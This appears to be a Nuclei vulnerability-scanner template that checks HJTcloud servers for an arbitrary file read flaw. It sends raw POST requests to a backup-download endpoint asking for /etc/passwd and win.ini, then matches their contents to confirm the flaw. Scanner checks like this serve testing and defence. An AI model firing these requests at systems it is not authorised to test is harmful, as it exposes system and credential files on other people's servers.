nuclei-templates/vulnerabilities/other/hjtcloud-arbitrary-file-rea...

47 lines
1.3 KiB
YAML
Raw Normal View History

id: hjtcloud-arbitrary-file-read
info:
name: HJTcloud Arbitrary File Read
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
tags: hjtcloud,lfi
requests:
- raw:
- |
POST /fileDownload?action=downloadBackupFile HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 20
fullPath=/etc/passwd
- |
POST /fileDownload?action=downloadBackupFile HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 20
fullPath=/Windows/win.ini
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: word
words:
- "extensions"
part: body
- type: status
status:
- 200